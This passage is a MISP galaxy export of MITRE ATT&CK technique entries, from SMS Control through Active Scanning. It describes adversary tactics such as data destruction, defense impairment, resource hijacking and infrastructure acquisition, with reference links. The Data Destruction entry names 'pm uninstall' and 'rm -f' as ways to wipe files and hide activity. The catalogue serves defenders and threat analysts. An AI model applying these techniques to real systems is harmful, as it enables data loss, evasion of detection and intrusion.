https://www.ssh.com/ssh/tunneling

SMS Control - T1582

Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or produce various external effects.

This can be accomplished by requesting the RECEIVE_SMS or SEND_SMS permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the SMS_DELIVER broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS KitKat)(Citation: Android SmsProvider)

The tag is: misp-galaxy:mitre-attack-pattern="SMS Control - T1582"

Table 6303. Table References

Links

https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html

https://android.googlesource.com/platform/packages/providers/TelephonyProvider//7e7c274/src/com/android/providers/telephony/SmsProvider.java

https://attack.mitre.org/techniques/T1582

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html

Data Destruction - T1662

Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.

To achieve data destruction, adversaries may use the pm uninstall command to uninstall packages or the rm command to remove specific files. For example, adversaries may first use pm uninstall to uninstall non-system apps, and then use rm (-f) <file(s)> to delete specific files, further hiding malicious activity.(Citation: rootnik_rooting_tool)(Citation: abuse_native_linux_tools)

The tag is: misp-galaxy:mitre-attack-pattern="Data Destruction - T1662"

Table 6304. Table References

Links

https://attack.mitre.org/techniques/T1662

https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/

https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

Execution Guardrails - T1627

Adversaries may use execution guardrails to constrain execution or actions based on adversary-supplied and environment-specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1627"

Table 6305. Table References

Links

https://attack.mitre.org/techniques/T1627

https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Hide Artifacts - T1628

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1628"

Table 6306. Table References

Links

https://attack.mitre.org/techniques/T1628

Dumpster dive - T1286

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).

Dumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)

The tag is: misp-galaxy:mitre-attack-pattern="Dumpster dive - T1286"

Table 6307. Table References

Links

https://attack.mitre.org/techniques/T1286

Impair Defenses - T1629

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.

The tag is: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1629"

Table 6308. Table References

Links

https://attack.mitre.org/techniques/T1629

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

https://partner.samsungknox.com/mtd

Dynamic DNS - T1333

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).

Dynamic DNS is an automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333"

Dynamic DNS - T1333 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311" with estimative-language:likelihood-probability="almost-certain"

Table 6309. Table References

Links

https://attack.mitre.org/techniques/T1333

Port redirector - T1363

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).

A port redirector redirects a communication request from one address and port number combination to another. It may be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Port redirector - T1363"

Table 6310. Table References

Links

https://attack.mitre.org/techniques/T1363

Internal Spearphishing - T1534

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is a multi-staged campaign where an email account is owned either by controlling the user’s device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)

Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)

The tag is: misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534"

Table 6311. Table References

Links

https://attack.mitre.org/techniques/T1534

https://blog.trendmicro.com/phishing-starts-inside/

https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6

Credential pharming - T1374

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Credential pharming is a form of attack designed to steal users' credentials by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)

The tag is: misp-galaxy:mitre-attack-pattern="Credential pharming - T1374"

Table 6312. Table References

Links

https://attack.mitre.org/techniques/T1374

Power Settings - T1653

Adversaries may impair a system’s ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)

Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)

For example, powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)

Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)

The tag is: misp-galaxy:mitre-attack-pattern="Power Settings - T1653"

Table 6313. Table References

Links

https://attack.mitre.org/techniques/T1653

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict

https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html

https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/

https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop

https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign

https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Encrypted Channel - T1573

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"

Table 6314. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1573

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

Acquire Infrastructure - T1583

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:mitre-attack-pattern="Acquire Infrastructure - T1583"

Table 6315. Table References

Links

https://attack.mitre.org/techniques/T1583

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

https://www.ic3.gov/Media/News/2022/220818.pdf

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Dynamic Resolution - T1637

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1637"

Table 6316. Table References

Links

https://attack.mitre.org/techniques/T1637

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

Device Lockout - T1446

An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.

On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)

On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode; they cannot set a new one. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"

Table 6317. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

https://attack.mitre.org/techniques/T1446

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html

Hide Artifacts - T1564

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564"

Table 6318. Table References

Links

https://attack.mitre.org/techniques/T1564

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Log Enumeration - T1654

Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).

Host binaries may be leveraged to collect system logs. Examples include using wevtutil.exe or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s CollectGuestLogs.exe to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)

Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Log Enumeration - T1654"

Table 6319. Table References

Links

https://attack.mitre.org/techniques/T1654

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Compromise Infrastructure - T1584

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure, an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584"

Table 6320. Table References

Links

https://attack.mitre.org/techniques/T1584

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

https://threatconnect.com/blog/infrastructure-research-hunting/

https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.icann.org/groups/ssac/documents/sac-007-en

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Data Destruction - T1485

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)

The tag is: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485"

Table 6321. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1485

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network

https://www.symantec.com/connect/blogs/shamoon-attacks

Firmware Corruption - T1495

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485).

The tag is: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495"

Table 6322. Table References

Links

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

https://attack.mitre.org/techniques/T1495

https://cyber.dhs.gov/assets/report/ar-16-20173.pdf

https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

Serverless Execution - T1648

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.

Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the IAM:PassRole permission in AWS or the iam.serviceAccounts.actAs permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)

Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)

The tag is: misp-galaxy:mitre-attack-pattern="Serverless Execution - T1648"

Table 6323. Table References

Links

https://attack.mitre.org/techniques/T1648

https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team

https://www.varonis.com/blog/power-automate-data-exfiltration

Resource Hijacking - T1496

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)

Additionally, some cryptocurrency mining malware identifies and then kills off processes belonging to competing malware to ensure it is not competing for resources.(Citation: Trend Micro War of Crypto Miners)

Adversaries may also use malware that leverages a system’s network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496"

Table 6324. Table References

Links

https://attack.mitre.org/techniques/T1496

https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

https://securelist.com/lazarus-under-the-hood/77908/

https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html

https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html

https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

Service Stop - T1489

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Service Stop - T1489"

Table 6325. Table References

Links

https://attack.mitre.org/techniques/T1489

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.secureworks.com/research/wcry-ransomware-analysis

Data Manipulation - T1565

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565"

Table 6326. Table References

Links

https://attack.mitre.org/techniques/T1565

Native API - T1575

Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.

The NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)

Adversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)

The tag is: misp-galaxy:mitre-attack-pattern="Native API - T1575"

Table 6327. Table References

Links

https://attack.mitre.org/techniques/T1575

https://developer.android.com/ndk/guides

https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf

Establish Accounts - T1585

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585"

Table 6328. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1585

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Active Scanning - T1595

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595"

Table 6329. Table References

Links

https://attack.mitre.org/techniques/T1595

https://wiki.owasp.org/index.php/OAT-004_Fingerprinting

https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Financial Theft - T1657

